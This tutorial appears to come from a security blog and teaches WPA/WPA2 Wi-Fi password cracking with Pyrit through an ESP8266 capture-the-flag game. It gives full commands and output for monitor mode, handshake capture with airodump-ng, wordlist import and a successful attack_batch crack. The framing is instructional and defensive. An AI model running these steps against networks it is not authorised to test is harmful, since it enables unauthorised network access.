Pyrit is one of the most powerful WPA/WPA2 cracking tools in a hacker's arsenal, with the ability to benchmark a computer's CPU speeds, analyze capture files for crackable handshakes, and even tap into GPU password-cracking power. To demonstrate how quickly it can hack a WPA/WPA2 password, we'll use it to play a Wi-Fi hacking CTF game anyone can practice for less than $10.
Wi-Fi is incredibly convenient but comes with inherent security problems that make using it riskier than a wired alternative. That's because anyone can join a WPA-encrypted Wi-Fi network provided they know the password, allowing an attacker direct access to other devices on the network and network traffic in general. Choosing a Wi-Fi password that is difficult to guess is very important, because, with a good password list and a program like Pyrit, even huge password lists can be searched through in a matter of minutes.
While we won't be using GPU cracking today, Pyrit is capable of using a compatible GPU to crack passwords even faster. It's dependent on your computer's hardware, and thus the setup process will depend on the type of GPU you have and whether you choose to use OpenCL or CUDA. Once GPU acceleration is enabled, Pyrit is one of the fastest tools available for WPA password-cracking out there.
You may get lucky in that the GPU of your computer already is compatible with Pyrit, but getting the GPU acceleration working is an unfun process that I'll leave to those of you brave enough. You can always attempt it by following Pyrit's guide on GitHub for instructions, but I wasn't able to get it working correctly on either laptop I tried it on, at the time of this writing.
- Don't Miss: Automating Wi-Fi Hacking with Besside-ng
Pyrit has many tools that are useful for hackers and pentesters besides just cracking passwords, and today, we'll use a few of those tools to help us play a capture-the-flag Wi-Fi hacking game. One helpful tool is the strip command, which strips down long capture files to only include relevant packets. And then there's the verify option that lets Pyrit confirm results via recomputation.
Pyrit also has several features to import multiple password lists into a large database. To prevent duplicates, the import_unique_passwords command can also strip out passwords that appear multiple times in the same file we're trying to import. After we import passwords to the database, we can start cracking them with the attack_batch option.
In Kali Linux, we can see the description of the tool by typing man pyrit in a terminal window.
NAME pyrit - A GPGPU-driven WPA/WPA2-PSK key cracker SYNOPSIS pyrit [options] command DESCRIPTION Pyrit exploits the computational power of many-core- and GPGPU-plat‐ forms to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time tradeoff. It is a powerful attack against one of the world's most used security-proto‐ cols. ...
Without adding passwords to the Pyrit database directly, the most basic attack we can run with Pyrit is the attack_passthrough option, summarized by manual description.
attack_passthrough Attack an EAPOL-handshake found in the packet-capture file(s) given by the option -r using the passwords read from the file given by the option -i. The options -b and -e can be used to specify the Access-Point to attack; it is picked automatically if both options are omitted. The password is written to the filename given by the option -o if specified. For example: pyrit -r test.pcap -b 00:de:ad:be:ef:00 \ -i words.txt attack_passthrough Pyrit attacks all EAPOL-handshakes at the same time if the option --all-handshakes is supplied.
While we'll step this up by loading some passwords into the database first, the most basic method of password cracking with Pyrit is incredibly simple to use.
To follow along, you'll need at a minimum a Kali-compatible wireless network adapter, a Wi-Fi network you know the password to, a device like a smartphone to join the network to create handshakes, and a computer running Kali Linux.
If you want to try out our scenario more easily, you can use an ultra-cheap ESP8266 microcontroller programmed in Arduino to both create a Wi-Fi network to hack and generate handshakes at the same time. For anyone wanting to practice with an MCU, my friends and I wrote a Wi-Fi hacking CTF game called the ChickenManGame, which is the world's most famous (and only) Wi-Fi hacking CTF game based on the ESP8266.
To play the game, I recommend using either a NodeMCU or D1 Mini microcontroller, both of which are based on the ESP8266 and cost between $2 and $5 each board. Load the ChickenManGame sketch in Arduino, install the needed libraries, and push the code to the ESP8266 following the instructions on the GitHub repository. After you've pushed the code to each microcontroller, plug in a red, green, and blue LED to each as shown in the instructions on GitHub.
- Buy a NodeMCU Board on Amazon
- Buy a NodeMCU Board on AliExpress
- Buy a D1 Mini MCU on Amazon
- Buy a D1 Mini MCU on AliExpress
Finally, plug each device into a Micro-USB power source, then connect a jumper wire from pin D7 to ground on only one of them. The ESP8266 without pin D7 connected to ground will create a Wi-Fi network named "Chicken Easy" with a number at the end. The second device with pin D7 connected to ground will join the Wi-Fi network that the first one created, generating WPA handshakes for you to capture and crack easily.
In our game today, we'll be trying to connect to an encrypted Wi-Fi access point with a WPA/WPA2 password we don't know. We'll do this in a few steps, using airodump-ng to grab the handshake, and Pyrit to crack the password.
To install Pyrit on a Kali system, type apt install pyrit in a terminal window. Pyrit is installed by default on full Kali installs, but for the lite version, you may need to install it manually.
~$ apt install pyrit Reading package lists... Done Building dependency tree Reading state information... Done pyrit is already the newest version (0.5.1+git20180801-1). pyrit set to manually installed. The following package was automatically installed and is no longer required: libgit2-27 Use 'apt autoremove' to remove it. 0 upgraded, 0 newly installed, 0 to remove and 1795 not upgraded.
Once it's finished installing, type pyrit -h to print the help menu and confirm it's installed on our system.
~$ pyrit -h Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Usage: pyrit [options] command Recognized options: -b : Filters AccessPoint by BSSID -e : Filters AccessPoint by ESSID -h : Print help for a certain command -i : Filename for input ('-' is stdin) -o : Filename for output ('-' is stdout) -r : Packet capture source in pcap-format -u : URL of the storage-system to use --all-handshakes : Use all handshakes instead of the best one --aes : Use AES Recognized commands: analyze : Analyze a packet-capture file attack_batch : Attack a handshake with PMKs/passwords from the db attack_cowpatty : Attack a handshake with PMKs from a cowpatty-file attack_db : Attack a handshake with PMKs from the db attack_passthrough : Attack a handshake with passwords from a file batch : Batchprocess the database benchmark : Determine performance of available cores benchmark_long : Longer and more accurate version of benchmark (5 minutes) check_db : Check the database for errors create_essid : Create a new ESSID delete_essid : Delete a ESSID from the database eval : Count the available passwords and matching results export_cowpatty : Export results to a new cowpatty file export_hashdb : Export results to an airolib database export_passwords : Export passwords to a file help : Print general help import_passwords : Import passwords from a file-like source import_unique_passwords : Import unique passwords from a file-like source list_cores : List available cores list_essids : List all ESSIDs but don't count matching results passthrough : Compute PMKs and write results to a file relay : Relay a storage-url via RPC selftest : Test hardware to ensure it computes correct results serve : Serve local hardware to other Pyrit clients strip : Strip packet-capture files to the relevant packets stripLive : Capture relevant packets from a live capture-source verify : Verify 10% of the results by recomputation
For our attack, we'll be using the attack_batch option, and we'll need a couple of pieces of information for the command to work.
First, we need to include a capture file that our WPA/WPA2 handshake is saved in. We'll add it by adding the -r flag, with the location of the file containing our handshake directly after. Next, we'll need to add a list of passwords to Pyrit, which we can do with the import_unique_passwords command and the -i flag to indicate the password list we want to add. We'll be using a WPA password list from the SecLists GitHub repository. Finally, we'll be using the -o flag to save the password to a file.
Our final command should look something like this when we're ready:
~$ pyrit -r capture.pcap -o savedpass attack_batch
Before we can execute the attack, however, we'll need to grab the handshake and the password list, so let's grab those first.
For our password list, we're going to download the excellent WPA cracking wordlist hosted at the SecList GitHub repository. To download it to our Desktop, type the following commands into a terminal window.
~$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt --2019-12-20 13:19:39-- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 22.214.171.124, 126.96.36.199, 188.8.131.52, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|184.108.40.206|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 45276 (44K) [text/plain] Saving to: ‘probable-v2-wpa-top4800.txt’ probable-v2-wpa-top 100%[===================>] 44.21K --.-KB/s in 0.07s 2019-12-20 13:19:39 (627 KB/s) - ‘probable-v2-wpa-top4800.txt’ saved [45276/45276]
When it's complete, we should have a password list of 4,800 of the worst passwords out there to start with, downloaded to our desktop. To know how quickly we'll be able to crack through them, we'll need to benchmark our system with Pyrit. To do so, type pyrit benchmark into a terminal window and wait while it completes.
~$ pyrit benchmark Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Running benchmark (1157.3 PMKs/s)... | Computed 1157.32 PMKs/s total. #1: 'CPU-Core (SSE2/AES)': 298.2 PMKs/s (RTT 2.9) #2: 'CPU-Core (SSE2/AES)': 312.0 PMKs/s (RTT 3.0) #3: 'CPU-Core (SSE2/AES)': 312.6 PMKs/s (RTT 2.7) #4: 'CPU-Core (SSE2/AES)': 310.5 PMKs/s (RTT 3.0)
Here, we can see that my rather old Lenovo can try about 1,157.3 PMKs per second, meaning it would take about 4.1 seconds to try every password in the file. Compare that to a new Macbook Pro with 4,226 PMKs per second, and you see how CPU power matters when it comes to cracking.
Let's add our passwords to the database with the import_passwords command, adding -i and the path to the password list we want to add. Type the following command into your terminal window, modifying the password list to match where you saved yours.
~$ pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Connecting to storage at 'file://'... connected. 4800 lines read. Flushing buffers.... All done.
Now we have 4,800 passwords saved in Pyrit's database, and we can use the attack_batch option.
To capture a handshake, we'll need to listen in on one device connecting to our target Wi-Fi network. First, let's put our card into wireless monitor mode so that we can listen in on handshake files.
- Don't Miss: Hack WPA & WPA2 Wi-Fi Passwords Using Airgeddon
First, open a terminal window and type ifconfig to locate the name of your wireless network adapter. If you're using an external USB adapter that's compatible with Kali, it will probably be named something like wlan1.
~$ ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 50:7b:9d:7a:c8:8a txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 856 bytes 71488 (69.8 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 856 bytes 71488 (69.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.0.37 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 2606:6000:66d0:a000:8991:f76f:faec:2713 prefixlen 64 scopeid 0x0<global> inet6 fe80::903f:322c:1ad9:a365 prefixlen 64 scopeid 0x20<link> ether 30:52:cb:6b:76:5f txqueuelen 1000 (Ethernet) RX packets 17933 bytes 22147581 (21.1 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10045 bytes 1333343 (1.2 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 00:c0:ca:95:6e:74 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Next, we'll put our card into wireless monitor mode with the command airmon-ng start wlan1. Airmon-ng is installed on Kali by default. When we run ifconfig again, our card should now be called "wlan1mon." Now, let's grab a handshake.
First, we'll run a scan to find what channel our target network is on. To do so, run airodump-ng wlan1mon. Again, you should already have airodump-ng.
~$ airodump-ng wlan1mon CH 10 ][ Elapsed: 0 s ][ 2019-04-29 12:32 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 18:FE:34:00:00:02 -40 4 0 0 3 48 WPA2 CCMP PSK Chicken_Easy_02
We can see our target network is on channel 3. Now that we know this, we can capture a handshake with the command airodump-ng wlan1mon -c 3 -w capture.
~$ airodump-ng wlan1mon -c 3 -w capture
When you've captured a handshake, you can confirm it with Pyrit. After copying the location of your capture file, run the command pyrit -r pathtocapturefile analyze to confirm you have a valid capture.
~$ pyrit -r '/root/Desktop/capture-01.cap' analyze Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Parsing file '/root/Desktop/marko-01.cap' (1/1)... Parsed 122 packets (122 802.11-packets), got 8 AP(s) #1: AccessPoint 84:61:a0:61:39:90 ('ATT9X3s2e4'): #2: AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01'): #1: Station 84:0d:8e:8c:b0:1c, 4 handshake(s): #1: HMAC_SHA1_AES, good, spread 1 #2: HMAC_SHA1_AES, good, spread 1 #3: HMAC_SHA1_AES, good, spread 87 #4: HMAC_SHA1_AES, good, spread 87 #3: AccessPoint 6e:4d:73:96:78:a7 ('Edgardo'): #1: Station cc:29:f5:57:fc:98 #4: AccessPoint c4:01:7c:57:69:a8 ('LILA-Guest'): #5: AccessPoint c4:01:7c:97:69:a8 ('LILA-STAFF'): #6: AccessPoint 6c:b0:ce:ad:1e:53 ('MyCharterWiFi53-2G'): #7: AccessPoint b0:98:2b:4a:b4:d4 ('MySpectrumWiFice-2G'): #8: AccessPoint c4:01:7c:17:69:a8 ('PS-WL-MO'):
Here, we can see that we have good handshakes, meaning we can proceed with cracking.
Now that we've captured the handshake and added the passwords to the database, we can run our attack_batch command we created before. Run the command pyrit -r pathtocapturefile -o savedpass attack_batch to try cracking handshakes we captured.
~$ pyrit -r '/root/Desktop/capture-01.cap' -o savedpass attack_batch Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Parsing file '/root/Desktop/capture-01.cap' (1/1)... Parsed 122 packets (122 802.11-packets), got 8 AP(s) Picked AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01') automatically. Tried 447 PMKs so far; 250 PMKs per second. password The password is '123456789'.
Success! If you're playing our Wi-Fi hacking CTF game, you can log into the Wi-Fi access point, navigate to 192.168.4.1, and click on your team's color to claim the game piece for your team.
If you're not playing our game, then you just cracked the password to a WPA/WPA2 network, provided the password was on the list. If it wasn't, you might need a more extensive password list, even to try brute-forcing it.
While we didn't go over everything Pyrit can do today, there is a lot we didn't cover. Of course, while Pyrit is one of the most potent brute-force attacks out there, an extremely strong password will still defeat the attack. Pyrit is capable of both dictionary and true brute-forcing attacks depending on what your system can handle, so make sure to pick strong passwords if you don't want to be vulnerable to easy cracking with tools like Pyrit.
I hope you enjoyed this guide to brute-forcing passwords using Pyrit! If you have any questions about this tutorial on using your CPU and GPU to crack passwords using Pyrit, please ask below, and if you have a comment or idea for a future episode, feel free to reach me on Twitter @KodyKinzie.
Start your White-Hat Hacker journey with Null Byte's Beginner's Guide to Mastering Linux eBook.